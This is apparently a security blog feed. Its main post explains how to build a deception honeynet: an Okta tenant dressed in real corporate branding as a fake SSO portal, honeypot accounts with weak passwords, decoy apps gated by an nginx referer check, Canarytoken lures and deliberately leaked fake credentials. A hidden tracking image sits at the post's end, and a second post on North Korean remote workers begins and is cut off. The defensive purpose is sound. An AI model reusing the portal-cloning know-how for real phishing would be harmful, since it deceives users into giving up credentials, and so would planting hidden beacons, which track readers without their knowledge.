<strong>basic telemetry pipeline</strong> to collect logs. This drastically lowers the barrier to entry: no need for full cloud subscriptions, firewall tuning, or heavy infrastructure. Because your apps live behind a fake SSO portal, the attacker experience still feels cohesive and real, but your costs stay near zero. For teams looking to experiment with deception without going through procurement or provisioning cycles, this is a fast, safe, and effective entry point.</p> <p>Since we’re opting for using a standalone IdP tenant such as Okta as our front door, most of the labor load consists of setting up user accounts and registering a few decoy applications or portals within it. Fortunately, Okta’s free developer tier is more than sufficient for standing up a basic SSO dashboard and simulating a realistic corporate login experience to get you started, though later on you will be paying for at least the basic plan to get the <code class="language-plaintext highlighter-rouge">subdomain.okta.com</code> naming convention for realistic bait. You’ll provision a handful of believable honeypot accounts using your real corporate domain (e.g., <code class="language-plaintext highlighter-rouge">j.smith@yourcorp.com</code>) and configure them to “authenticate” into fake apps, VPNs, or admin tools, each of which points to infrastructure you control in an isolated cloud environment. While this step adds a bit of overhead compared to a traditional honeypot setup, it unlocks much higher realism, especially for detecting identity-based attacks like password spraying, MFA fatigue, or credential stuffing. The rest of this post will walk through how to tie these components together into a safe, disposable, and convincingly realistic trap.</p> <h2 id="the-primary-bait-honeypot-accounts">The Primary Bait: Honeypot Accounts</h2> <p><br /> While <a href="https://github.com/robertdavidgraham/masscan">exposed VMs and open ports</a> still catch their share of scanners and exploit attempts, today’s more capable adversaries often lead with identity-based access, credential stuffing, password spraying, or phishing campaigns that aim to walk in the front door. That makes it crucial to populate your decoy environment with realistic-looking user accounts, especially if you’re leveraging a standalone identity provider like Okta. These honeypot identities should mirror your actual naming conventions (<code class="language-plaintext highlighter-rouge">it.admin@yourcorp.com</code>, <code class="language-plaintext highlighter-rouge">vpn.engineer@yourcorp.com</code>), but exist only within the fake IdP tenant, with no connection to production systems. You can enroll them in decoy SSO apps, assign them weak or recycled passwords, and even script behavioral lures (like scheduled logins or app usage) to boost authenticity. Because they live entirely outside your corporate directory, any login attempt is inherently suspicious, and all activity tied to them becomes high-signal telemetry. This setup gives you a front-row seat to the tactics attackers use against your brand, with zero operational risk.</p> <h2 id="a-quick-but-critical-disclaimer">A Quick but Critical Disclaimer</h2> <p><br /> Before diving deeper, it’s important to emphasize that this entire approach is built around <strong>strict isolation</strong>. The honeynet environment should never be connected to your production or enterprise network, and should not have access to any sensitive data, credentials, or internal services. Think of it as a self-contained sandbox: a decoy environment purpose-built for observation, not interaction. For existing Okta customers, this means setting up a second tenant. For non-Okta customers, you’re likely about to become at least a Basic plan customer strictly for this honeynet. That said, the goal here is to let attackers think they’ve found something interesting, without ever giving them a chance to pivot, escalate, or cause real harm. This is why infrastructure-as-code tools like Terraform or Bicep are so valuable here: they allow you to spin up a disposable, instrumented environment quickly and tear it down just as easily if anything looks risky or out of scope. Honeynets and deception tech should feed your visibility, not become a liability.</p> <h2 id="finding-the-middle-ground">Finding the Middle Ground</h2> <p><br /> One of the common challenges I’ve seen with deception technology solutions is balancing the realism of baiting your real resources with keeping the honeynet segregated from said resources. Sure, setting up a few misconfigured VMs is going to get attention, but did you really learn anything about your adversary when your honeynet gets mass-scanned, <a href="https://bloodhound.readthedocs.io/en/latest/">Bloodhounded</a>, and handed off to some ransomware crew? We already knew that would happen. It happens every day. Essentially, what we’re hoping to catch here is not just the everyday garbage (which can also be useful! Just not <em>as</em> useful), but also who has a particular interest in your network and may be explicitly targeting it. For that, we need to ensure not just that there is robust honeynet telemetry in place, but also that it is realistic enough to attract the good stuff. For cloud in particular, that’s primarily going to involve the usage of the same domain names and infrastructure identifiers that your production environment is currently using, and that comes with some tradeoffs.</p> <p>So on the topic of isolation, some pros and cons are at play. Clearly the safest option is to build it inside a <strong>completely separate Cloud provider tenant</strong>, which guarantees that nothing in the environment can be accessed from or grant access to your production systems. This hard boundary is ideal from a security perspective, but it comes with a drawback: you <a href="https://techcommunity.microsoft.com/discussions/deploymentnetworking/splitting-company-into-2-tenants/1604025"><strong>can’t reuse</strong></a> your organization’s primary domain name in the new tenant. Since Azure, for instance, requires domain verification at the tenant level, you’d have to stand up your honeynet using a different domain altogether. This breaks the illusion for attackers, who might quickly recognize that corp-honeynet.net doesn’t match your actual brand. In an attack simulation or opportunistic scanning scenario, that divergence can make all the difference between a successful deception and being ignored.</p> <p>To preserve that domain realism, some teams consider building the honeynet in a <strong>separate Azure subscription within the same tenant</strong>. This keeps the look and feel consistent, you can use your real domain (<code class="language-plaintext highlighter-rouge">yourcorp.com</code>), real SSO settings, and even similar resource naming. However, this comes with serious trade-offs: privilege boundaries between subscriptions aren’t always airtight, and subtle misconfigurations in role assignments, conditional access, or shared resource policies can open the door to <a href="https://posts.specterops.io/azure-privilege-escalation-via-azure-api-permissions-abuse-74aee1006f48">unintended lateral movement or privilege escalation</a>. In a worst-case scenario, an attacker who successfully compromises a honeypot resource could begin probing or pivoting into production systems, turning a deception exercise into a real incident. This would be a disaster. Good luck ever doing this in your org ever again, if you ever got the leadership signoff to do so in the first place.</p> <p>That’s where using an <strong>external identity provider like Okta</strong> presents a compelling middle ground. With a standalone Okta tenant, you can create honeypot accounts that look and feel exactly like real ones, complete with the <strong>actual corporate domain in the username</strong> (e.g., <code class="language-plaintext highlighter-rouge">vpn.admin@yourcorp.com</code>), all without requiring domain verification or linking to your production directory. From the attacker’s perspective, they’ve compromised valid credentials and landed in a legitimate corporate SSO portal. But behind the scenes, everything they touch is tied to <strong>tied to isolated, disposable infrastructure</strong> in a sandboxed Azure tenant, other cloud environment or fake apps. This gives you the realism of shared domains with the safety of total segmentation, enabling high-fidelity deception without risking your core environment.</p> <h2 id="the-detailed-technical-differences">The Detailed Technical Differences</h2> <p><br /> It’s important to clarify that while this setup still relies on separate cloud tenants for security isolation, the use of an external identity provider like Okta adds a critical layer of <strong>plausible realism</strong>, and that is sort of the critical point here. In a native Azure-only design, the separation between tenants is obvious, an attacker might notice the domain name doesn’t match, or the login page looks unfamiliar. But with an external IdP, you’re able to replicate your branding, domain structure, and authentication flow in a completely fake environment, all without requiring DNS control or domain verification. This obfuscation blurs the line between the honeynet and your real enterprise infrastructure.</p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/780b48aa-56c6-4488-a635-ab4e2ee1031f" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>Come on in</em></td> </tr> </tbody> </table> <p><br /></p> <p>To an attacker, logging into a convincingly branded Okta portal using a <code class="language-plaintext highlighter-rouge">@yourcorp.com</code> identity and landing in a dashboard full of “legitimate” apps feels authentic, even though they’re in a sandboxed trap you control end-to-end. In other words, setting up another Azure tenant (<code class="language-plaintext highlighter-rouge">company.onmicrosoft.com</code> vs <code class="language-plaintext highlighter-rouge">company-hub.onmicrosoft.com</code>) might look a little suspect, but using an external IdP allows for some creativity in the deception, like presenting a login portal at login.company-secure.net that (critically) <strong><em>accepts <code class="language-plaintext highlighter-rouge">@company.com</code></em></strong> <strong><em>usernames,</em></strong> mimics your corporate branding, and leads to a fake SSO dashboard with tiles for “Internal VPN,” “Admin Console,” and “HR Portal”, all pointing to isolated infrastructure designed to monitor and log attacker behavior. You would want to closely mimic your real environment, not necessarily for realism (though still a factor), but for your own intelligence collection purposes. You want to know what the attacker is particularly interested about in your resources, whether that is data exfiltration, establishing long-term persistence, or any other tactics you can understand from their logged behavior.</p> <p>From here, you’d be ingesting the logging from your Okta portal to see what the attacker is doing inside the application, and what integrated apps they are interested in. Following that, you’re just limited by your own time, effort and funding as far as integrating follow-on honeypot apps that they would then access. For a low-interaction setup, this might just be a bunch of static html dummy logins that don’t lead anywhere. For a high-interaction setup, this might include dummy instances of the same apps you use in your corporate environment – Sharepoint, Workspace, AWS services, maybe even a full-blown OpenVPN honeynet.. the sky (and your budget) is the limit.</p> <p>To recap – the benefit to this approach is two-fold. First, you are able to notionally log the entire kill-chain from the initial access via Okta all the way through app access, rather than setting up a random misconfigured honeypot system or service. Second, you’re able to leverage additional legitimacy through the usage of Okta by using fake users using your real email domain, which makes things a little less suspicious when attackers are accessing apps that might otherwise not look like they are part of your corporate environment… sort of a reverse phish. This allows for a super dynamic, homebrewed and modular approach to deception tech that you can do on the relative cheap, versus buying something out of the box.</p> <h2 id="the-set-up-building-the-front-door">The Set Up: Building the Front Door</h2> <p><br /></p> <p>Start by logging into the <strong>Workforce Identity Developer Edition</strong> tenant you just spun up. From the admin console’s landing page, jump straight to <strong>Customisations ➜ Branding</strong>. Swapping in your company’s real logo, color palette and favicon takes only a few clicks but pays enormous dividends in believability; I also like to add the genuine corporate copyright line in the footer so the page survives a quick visual “is this legit?” sniff test. Leave the default Okta domain (<code class="language-plaintext highlighter-rouge">yourtenant.okta.com</code>) untouched, for attackers, the familiar look and the <code class="language-plaintext highlighter-rouge">@yourcorp.com</code> usernames matter far more than the URL itself, and it keeps cost (and DNS paperwork) at zero. If you search around, you’ll find that many other organizations are also using the <code class="language-plaintext highlighter-rouge">subdomain.okta.com</code> convention anyway, so your deception solution is in good legitimate company.</p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/0373eddc-b306-4f6d-b255-26603fedf1ea" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>Mr. Wonka will NOT be pleased</em></td> </tr> </tbody> </table> <p><br /></p> <p>Next, move to <strong>Directory ➜ People</strong> and start seeding your honeypot identities. Mimic the job titles and departmental email prefixes your real users would have, <code class="language-plaintext highlighter-rouge">vpn.engineer@yourcorp.com</code>, <code class="language-plaintext highlighter-rouge">it.helpdesk@yourcorp.com</code>, maybe even <code class="language-plaintext highlighter-rouge">cfo.office@yourcorp.com</code>, but keep passwords intentionally weak or recycled (e.g., <code class="language-plaintext highlighter-rouge">Summer2025!</code>). Keep in mind you will more than likely be using fake, created personas that exist only for this tenant. You could mimic real users, but this will require some coordination with your organization (this should be happening anyway!), ensuring no legitimate users stumble upon your honeynet and attempt to use it. If you want extra realism, schedule a tiny automation (Okta Workflows or an external script) that logs each account in once a day; a bit of baseline “noise” helps fool both bots and humans.</p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/346a7b10-c716-45ff-9641-e1cde6075b60" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>Typical nepotism at work</em></td> </tr> </tbody> </table> <p><br /></p> <p>With users in place, head over to <strong>Applications ➜ Applications ➜ Create App Integration</strong>. For lightweight traps, choose <strong>Bookmark App</strong>, it’s nothing more than a tile that points to a URL (your static HTML dummy VPN login, fake Jira splash screen, or canary token document share). For higher interaction lures, pick <strong>OIDC → Web App</strong> or <strong>SAML 2.0</strong>, paste in the ACS/redirect URL of your honeynet service, and accept the default settings. Either way, upload the official icon of the product you’re spoofing (the <a href="https://www.jenkins.io/">Jenkins logo</a>, the GitHub <a href="https://github.com/octocat">Octocat</a>, the “lock” glyph from <a href="https://www.paloaltonetworks.com/sase/globalprotect">GlobalProtect</a>) so the dashboard feels crowded with recognizable corporate tooling. Finally, assign each app to <strong>Everyone</strong>, as there’s no need to segregate apps (unless you want to), and verify you can sign in end to end with a test account. For high-interaction lures, you’ll be configuring the SSO for passthrough authentication. You want the attacker to think they’ve gotten all the keys through your Okta dashboard. This obviously will take quite a bit of effort to build on the backend, and we’ll cover that further down.</p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/31d2d9a0-572e-49bb-abb1-9345fae91e2c" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>Mixing fake apps with real-ish ones is easy with tiles</em></td> </tr> </tbody> </table> <p><br /></p> <p>The last mile is <strong>telemetry</strong>. In the developer tier you can’t enable log streaming, but the System Log API is wide open. Create an API token (<strong>Security ➜ API ➜ Tokens</strong>) and point a small Lambda or Azure Function at the <code class="language-plaintext highlighter-rouge">/api/v1/logs</code> endpoint every few minutes; ship the JSON events into Sentinel, Elastic, or even a simple SQLite file. You’ll capture who hit the login page, which account they tried, whether MFA was challenged, and, most importantly, exactly which dummy app tile they clicked next. Tie that to web server logs from the backend honeynet VMs and you now have a full, timestamp aligned picture of every step the intruder takes from “Okta credential spray” to “lateral movement recon”, all without exposing a single production asset.</p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/97de6011-feb0-44e0-9a89-f8d4637d6d50" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>Simple export to SIEM or your choice of reviewer</em></td> </tr> </tbody> </table> <p><br /></p> <h3 id="a-note-on-lightweight-custom-apps">A Note on Lightweight Custom Apps</h3> <p><br /> As mentioned, the easiest way to populate your honeynet dashboard is with <strong>lightweight, static decoy apps</strong>, simple HTML pages that mimic login portals, internal tools, or document shares. These pages don’t need to do anything beyond looking plausible; their value lies in what gets clicked, what gets typed, and what behavior follows. That’s often more useful than a high-fidelity backend, especially if your goal is signal over spectacle. But realism without control can backfire. If an attacker discovers your dummy GitHub portal or VPN login directly, say, by stumbling onto it via Shodan or running recon across a cloud IP range, that click doesn’t tell you much. Worse, you lose context: was the attempt part of your honeynet campaign, or just noise?</p> <p>To enforce flow and context, it’s worth applying access restrictions at the web server layer, and NGINX makes this easy. A simple <code class="language-plaintext highlighter-rouge">nginx.conf</code> rule that checks for a valid Referer (i.e., traffic must originate from your Okta honeynet portal) ensures that your static apps only respond to requests coming through the path you’ve designed. This way, you maintain ownership over the attacker’s journey, and any interaction with your apps inherently implies they compromised one of your fake accounts and successfully navigated the SSO flow, raising the value and fidelity of the telemetry you collect. In short, <em>don’t let attackers just trip over your bait</em>. Make them move through the funhouse you have built for them.</p> <p>That NGINX config could look something like this:</p> <p><br /></p> <div class="language-nginx highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">server</span> <span class="p">{</span> <span class="kn">listen</span> <span class="mi">443</span> <span class="s">ssl</span><span class="p">;</span> <span class="kn">server_name</span> <span class="s">dummyapp.yourdomain.com</span><span class="p">;</span> <span class="kn">ssl_certificate</span> <span class="n">/etc/ssl/certs/fullchain.pem</span><span class="p">;</span> <span class="kn">ssl_certificate_key</span> <span class="n">/etc/ssl/private/privkey.pem</span><span class="p">;</span> <span class="kn">access_log</span> <span class="n">/var/log/nginx/dummyapp_access.log</span><span class="p">;</span> <span class="kn">error_log</span> <span class="n">/var/log/nginx/dummyapp_error.log</span><span class="p">;</span> <span class="kn">location</span> <span class="n">/</span> <span class="p">{</span> <span class="c1"># Only allow if referrer matches Okta portal</span> <span class="kn">if</span> <span class="s">(</span><span class="nv">$http_referer</span> <span class="s">!~*</span> <span class="s">"^https:</span><span class="err">\</span><span class="n">/\/</span><span class="s">([a-zA-Z0-9</span><span class="err">\</span><span class="s">-]+)</span><span class="err">\</span><span class="s">.okta</span><span class="err">\</span><span class="s">.com</span><span class="err">\</span><span class="n">/"</span><span class="s">)</span> <span class="p">{</span> <span class="kn">return</span> <span class="mi">403</span><span class="p">;</span> <span class="p">}</span> <span class="kn">root</span> <span class="n">/var/www/dummyapp</span><span class="p">;</span> <span class="kn">index</span> <span class="s">index.html</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> </code></pre></div></div> <p><br /></p> <h2 id="another-benefit-account-diversity">Another Benefit: Account Diversity</h2> <p><br /> One of the underappreciated advantages of using an external identity provider like Okta is the ability to <strong>diversify your honeypot accounts</strong> to mirror the messiness of a real enterprise. Not every attacker gets tripped up by a brute-force trap, as many are testing identity posture, probing for weak MFA enforcement, or just waiting for someone to tap “Approve” out of fatigue. In this setup, you can configure some honeypot accounts with simple username/password access to simulate technical debt or legacy applications, while enrolling others in MFA via Okta Verify. These MFA-enabled accounts can be paired to defender-controlled mobile devices or emulators, allowing you to <strong>manually approve logins after repeated push attempts</strong>. The result is a controlled environment for studying attacker behavior under real-world conditions, including tactics like MFA bombing, while maintaining full containment and visibility. Just be aware that Okta Verify only allows one account per tenant to be active per device, so scaling this technique will require multiple devices, emulators, or thoughtful rotation.</p> <h3 id="tools--tips-managing-mfa-simulation-at-scale">Tools &amp; Tips: Managing MFA Simulation at Scale</h3> <p><br /> Because Okta Verify only supports one account per org per device, scaling out push-based honeypot accounts takes a little planning. Fortunately, you’ve got options:</p> <ul> <li> <p><strong>Emulators:</strong> Tools like <a href="https://developer.android.com/studio">Android Studio</a> or <a href="https://www.genymotion.com/">Genymotion</a> let you spin up multiple virtual Android devices, each running its own instance of Okta Verify. Perfect for testing multiple honeypot accounts in parallel.</p> </li> <li> <p><strong>Burner Devices:</strong> Older phones or tablets can serve as physical Okta Verify clients. This works well if you’re running a persistent honeynet and want a low-maintenance setup.</p> </li> <li> <p><strong>Account Rotation:</strong> If you’re simulating one attacker flow at a time, you can reassign Okta Verify enrollment between honeypot accounts as needed. It’s slower, but keeps things simple.</p> </li> </ul> <p>So in order to diversify what you can catch in the initial access phase, it’s valuable to mix in the brute-forceable password logins with a few MFA pushes. The additional level of effort that comes with push spam also can assist an analyst in potentially differentiating between spray-and-pray trash that hits everyone versus an adversary that may have a targeted interest in your organization specifically. I’d say it’s worth the extra effort to set this up for at least a few accounts.</p> <h2 id="counterintelligence-considerations">Counterintelligence Considerations</h2> <p><br /> This leads to another benefit. If your honeynet is designed to attract not just random opportunists but more deliberate threat actors, it’s worth thinking beyond simple traps and toward <strong>controlled leaks and counterintelligence</strong>. One effective technique is to intentionally expose certain honeypot user credentials, either in staged breach data, fake GitHub repos, or dark web-adjacent paste sites, to simulate a realistic compromise. This not only helps test how attackers consume leaked data, but also gives you a chance to observe how they behave with partial access, particularly when MFA stands in their way.</p> <p>For example, let’s say you’ve configured your honeypot accounts with TOTP-based MFA and assigned each a dummy phone number (using a burner SIM, Twilio, or Google Voice). If a threat actor gains the username, successfully sprays the password, but can’t log in without the 6-digit code, you may observe them <strong>attempting to phish the code directly</strong>. This could take the form of SMS messages impersonating IT support (<em>“Please reply with your login code to confirm your identity”</em>) or calls asking the “employee” to read their MFA prompt. If you’re logging both authentication attempts and incoming communications to the defender-controlled honeypot number, you’ll have visibility into the entire sequence — from credential use to social engineering follow-up. A “leaked” employee list with a mobile number accomplishes this cleanly.</p> <p>This kind of deception adds a counterintelligence element to your wider detection strategy. By watching how adversaries engage with what they believe is real data, you gain insight into their techniques, tooling, and level of sophistication. It also provides an opportunity to observe how actors pivot, adapt, or escalate their tactics when confronted with basic security friction. Done carefully, this level of instrumentation can turn your honeynet from a passive trap into an active lens on attacker behavior, and one that serves both detection and strategic intel goals.</p> <p>Essentially the concept here is known as <a href="https://en.wikipedia.org/wiki/Canary_trap">“leak seeding”</a>, or the deliberate act of publishing fake but realistic-looking credentials, secrets, or internal data in locations where threat actors are likely to find them. The goal isn’t necessarily to protect real assets, but to lure attackers into engaging with a controlled honeynet environment. By planting staged leaks in public code repositories, paste sites, or breach forums, defenders can simulate the fallout of a compromise, then monitor how adversaries interact with that bait to study their tools, techniques, and priorities. It’s a proactive counterintelligence tactic that turns “being breached” into an opportunity to learn.</p> <h2 id="possible-app-layer-options">Possible App Layer Options</h2> <p><br /> This is where you can get really creative, but for the purposes of this writeup, I’ll stick to as many free options as I can. So once you’ve stood up your Okta identity layer and configured a handful of honeypot users, the next step is to give those users somewhere to go. In a real enterprise environment, authenticated users land on a dashboard with icons for internal tools, productivity suites, or admin consoles. We want to recreate that same experience for our fake users, and by extension, for any attacker who manages to log in.</p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/d7a477c5-67e0-4bbe-bf2c-612af5cac1c2" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>Some of these are fake custom built HTML, some are real. Can you tell which is which?</em></td> </tr> </tbody> </table> <p><br /></p> <p>This is where <strong>static web apps</strong> come in. While they aren’t full-blown enterprise tools under the hood, they can look convincing enough to fool an attacker into interacting. For example, you can clone the look and feel of SharePoint Online using a simple HTML/CSS template and deploy it to a free-tier Azure Static Web App or Cloudflare Pages site. These platforms let you host and serve static content globally, often with built-in CI/CD from GitHub, making it easy to spin up or tear down environments at will. Each fake app, whether it’s “SharePoint,” “VPN Console,” or “IT Admin Portal”, should live at its own endpoint, with URLs like <code class="language-plaintext highlighter-rouge">https://sharepoint-secure.pages[.]dev</code> or <code class="language-plaintext highlighter-rouge">https://internal-console.azurestaticapps[.]net</code>. This would look sketchy under normal circumstances, but we’re relying on the added legitimacy that Okta has afforded us via our faked login portal and dashboard. Additionally, the custom bookmark app afforded by Okta means you can dress these up to look like real Sharepoint, but the attacker will be accessing a simple html with file host clone. This took me less than 10 minutes to build, with each link mapping to a CanaryToken-ed dummy document. You can imagine what is feasible in a day or a week of building:</p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/d7f2ce85-d35f-4d68-a47e-950f4b2f335d" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>Real enough - but you can really sell it with some more effort</em></td> </tr> </tbody> </table> <p><br /></p> <p>With that said, static content alone obviously isn’t enough. You also need to control access. If someone stumbles upon one of your fake apps via Google, a misconfigured DNS entry, or a leaked URL, you don’t want them bypassing your Okta SSO trap. To enforce this, you can use a lightweight <strong>JavaScript referrer check</strong>. This script examines the <code class="language-plaintext highlighter-rouge">document.referrer</code> header and automatically redirects or blocks access if the visitor didn’t come through the legitimate Okta dashboard. It’s not a foolproof defense (attackers can spoof headers), but it does provide a useful gating mechanism that reinforces the illusion: real users go through Okta; anyone else gets kicked out. If you’re using Cloudflare Pages, you can bolster this even further by writing firewall or page rules that restrict traffic based on referrer headers, all without touching server-side code.</p> <h2 id="turning-fake-apps-into-intelligence-assets">Turning Fake Apps into Intelligence Assets</h2> <p><br /> Now that your attacker has landed inside a visually realistic fake app, the goal is to observe what they try to do. Do they browse a file repository? Try to download documents? Look for admin panels or submit forms? One easy way to capture this behavior is by seeding your static sites with <strong>Canarytokens</strong>: free, prebuilt traps that alert you when interacted with.</p> <p>For example, <a href="Canarytokens.org">Canarytokens.org</a> allows you to generate Word or Excel files that “call home” when opened, as well as web bug tokens, DNS beacons, and even cloned login forms. You might embed a fake Excel spreadsheet called <code class="language-plaintext highlighter-rouge">2024-Bonus-Projections.xlsx</code> in your SharePoint clone, or link to a “VPN credentials export” that’s actually a Canarytoken-powered PDF. These serve not just as decoys but as telemetry producers. Once clicked, they’ll send alerts to your inbox or webhook endpoint, giving you visibility into what piques an attacker’s interest. That insight can inform everything from SOC alert tuning to phishing lure design to credential stuffing detection rules.</p> <p>If you want to go deeper, you can add logging to the static apps themselves via services like <a href="https://plausible.io/">Plausible Analytics</a>, or self-hosted collectors that log user-agent strings, behavior flows, and button clicks. The key is to treat these apps not just as traps, but as <strong>intelligence sensors</strong> designed to reveal attacker preferences and priorities. If you opted for Cloudflare, the free tier of <a href="https://workers.cloudflare.com/">Cloudflare Workers</a> provide a powerful and cost-effective way to add custom telemetry and logging to your honeypot environment, with a generous free tier that supports up to 100,000 requests per day. By leveraging Workers, you can capture detailed request metadata, enforce access controls, and even integrate with external logging or alerting systems, helping you gain deeper insight into attacker behavior while keeping your infrastructure simple and affordable.</p> <h2 id="monitoring-the-funnel-from-login-to-lure">Monitoring the Funnel: From Login to Lure</h2> <p><br /> Your deception technology solution should tell a story, and that means correlating data from multiple layers. Okta provides detailed logs for user logins, failed password attempts, and MFA prompts, which can show you exactly how an attacker gained access and what tactics they used. If you’ve configured some honeypot accounts with password-only access and others with MFA, you’ll be able to see whether they spray common passwords across accounts, attempt MFA fatigue attacks, or skip accounts that require a second factor.</p> <p>Downstream, you’ll receive alerts from your Canarytokens when files are opened or forms are submitted, completing the picture. You can correlate “User X authenticated via Okta” with “User X accessed the SharePoint tile,” followed by “User X triggered a canary document alert”, with user telemetry from Cloudflare Workers. That kind of kill-chain visibility is nearly impossible to get from traditional honeypots.</p> <p>Best of all, all of these components live outside your real infrastructure. Okta’s developer tenant, your static web apps, and your telemetry tooling are completely disconnected from your corporate systems, which means any interaction is inherently suspicious and your production environment is never at risk. If someone’s in your fake SharePoint portal using a known username, they didn’t just stumble upon it via mass-scan, they’re operating with intent. That makes your alerts not only high-signal, but often early warning indicators of a broader campaign.</p> <h2 id="further-maturity-getting-into-full-fledged-virtual-honeynets">Further Maturity: Getting into Full-Fledged Virtual Honeynets</h2> <p><br /> As your deception setup matures and you begin to demand deeper interaction or greater realism, you may find yourself moving beyond static sites and lightweight telemetry. This is where traditional compute platforms like <strong>AWS EC2</strong> or <strong>Azure VMs</strong> come into play. While these options typically introduce some cost, they also open the door to high-interaction honeypots. These are systems that can fully emulate services like SSH, RDP, web apps, or even internal admin tools. Running full operating systems in isolated cloud environments allows you to capture everything from command execution and lateral movement attempts to file uploads and privilege escalation behaviors.</p> <p>I won’t get into technical walkthroughs as these are very well covered elsewhere. I would recommend the <a href="https://aws.amazon.com/blogs/security/how-to-detect-suspicious-activity-in-your-aws-account-by-using-private-decoy-resources/">AWS guide</a> to start, as well as deeper dives from <a href="https://medium.com/@sudojune/deploying-a-honeypot-on-aws-5bb414753f32">Steve Gathof</a> and <a href="https://bohansec.com/2023/11/28/Deploy-T-Pot-Honeypot-To-AWS/">BohanSec</a>. The latter two utilize heavy usage of <a href="https://github.com/github-rashelbach/-T-Pot-Honeypot">T-Pot</a>, a T-Mobile multi-honeypot solution that is easy to standup in a solution like AWS EC2.</p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/ce85509a-f24b-49e1-9b8f-5dd6abe4cc64" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>Putting the T-Pot on</em></td> </tr> </tbody> </table> <p><br /></p> <p>So imagine you deploy T-Pot on an AWS EC2 instance, but instead of exposing it to the open internet like most public T-Pot deployments, you lock it behind a fake VPN tile in your Okta SSO dashboard. This means the only path to the honeypot is through a seemingly legitimate @yourcorp.com identity and an SSO login page that mirrors your corporate branding. Once “logged in,” the attacker is presented with what looks like a corporate VPN or internal access portal, which silently proxies them to the T-Pot interface or forwards traffic to the EC2 instance via a private listener. The attacker now believes they’ve made it past the perimeter and are sitting on internal infrastructure, all while you’re collecting telemetry across every emulated service, from SSH and SMB to ElasticPot and Honeytrap.</p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/8e5fc552-f10e-40c5-94dc-29128e8b3ce9" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>The Gold Standard</em></td> </tr> </tbody> </table> <p><br /></p> <p><strong>Why this is better than an open honeypot:</strong></p> <ul> <li> <p><strong>Targeted access</strong> – You can control who reaches the honeypot and under what conditions. Open honeypots get flooded with mass scans; this setup filters for more targeted activity (e.g., credential stuffing, phishing).</p> </li> <li> <p><strong>Realism without risk</strong> – From the attacker’s view, they walked in through a real SSO portal and landed inside the network. From your side, everything is fake and instrumented.</p> </li> <li> <p><strong>Identity-layer telemetry</strong> – You capture login attempts, password spray, MFA spam, and app selection before a single packet hits the honeypot—critical intel that’s invisible in traditional T-Pot deployments.</p> </li> <li> <p><strong>Controlled kill chain</strong> – By staging access through Okta, you decide which apps, systems, and services the attacker can “find” next. It’s a curated deception path, not a junkyard of unguarded bait.</p> </li> </ul> <p>Overall, this finely tunes your captured telemetry. Where an open honeypot infrastructure will see a lot of drive-by opportunism, this approach filters attacker behavior to just those specifically interested in your organization enough to overcome the barriers you placed in front of this infrastructure. Now you can see what exactly happens and what exactly an adversary is interested in, as well as their level of sophistication, should they actually breach your network.</p> <h2 id="wrapping-it-all-up-deception-as-a-force-multiplier">Wrapping It All Up: Deception as a Force Multiplier</h2> <p><br /> The reality is that attackers are getting smarter, stealthier, and more tailored in their operations, so your defenses should be too. What this blog post has outlined is a way to trap bad actors, but also a way to transform your cloud presence into a source of intelligence. By building a deception environment around external identity providers like Okta, isolating infrastructure in sandboxed tenants, and layering in believable static or interactive lures, you turn passive decoys into active sensors. This approach is preferred because it doesn’t just tell you <em>that</em> someone knocked on your door; it tells you <em>who</em>, <em>how</em>, and <em>why</em>.</p> <p>And crucially, it does all this without needing enterprise-grade security budgets or specialized software. Most of the building blocks, like Azure, Cloudflare, Okta, static site hosting, even alerting pipelines are free or already available in your environment. The key is combining them strategically, with just enough realism to attract interest, and just enough control to stay safe.</p> <p>Whether you’re looking to better understand how you’re being targeted, feed detection engineering with more relevant signals, or simply raise your defensive posture through proactive telemetry, this model gives you a powerful toolset. Start small, tune as you go, and remember: deception isn’t just about catching the adversary, it’s about learning from them. That results in intelligence that is highly modular, and scales to your needs and budget.</p> <p><img src="http://canarytokens.com/terms/traffic/static/h8sydbzw3bpqcvs52r823841n/index.html" style="display: none;" /></p>
  121. Catching North Koreans & Laptop Farms

    Fri, 13 Jun 2025 00:00:00 -0000

    Since it is the flavor of the last few months and many are talking about it, I thought I would try to throw together all the detection techniques I could for catching DPRK worker schemes. I’ve also noticed that most are talking about techniques for catching them before they get hired – not many are talking about catching the ones that may already be working for them. So as a result…. have a long blog post! This is an attempt to gather every iteration of how this scheme works, at least as is currently known today.
    <p>Since it is the flavor of the last few months and many are talking about it, I thought I would try to throw together all the detection techniques I could for catching DPRK worker schemes. I’ve also noticed that most are talking about techniques for catching them before they get hired – not many are talking about catching the ones that may already be working for them. So as a result…. have a long blog post! This is an attempt to gather every iteration of how this scheme works, at least as is currently known today.</p> <p></p> <p></p> <h1 id="background-north-koreas-remote-worker-deception">Background: North Korea’s Remote Worker Deception</h1> <p></p> <p>In recent years, the U.S. government has publicly warned of a quiet but sophisticated campaign by North Korea to infiltrate the global tech workforce—not with malware, but with people. According to joint advisories from the FBI, Department of State, and the Department of the Treasury, the DPRK has deployed thousands of highly skilled IT professionals to work remotely for companies worldwide. Disguised as freelance developers or contractors, these operatives aim to generate revenue for the North Korean regime while gaining access to potentially sensitive technologies and internal corporate systems.</p> <p>The scheme is both clever and troubling. These remote workers often present forged documents, including fake U.S. passports or stolen identities, to create credible 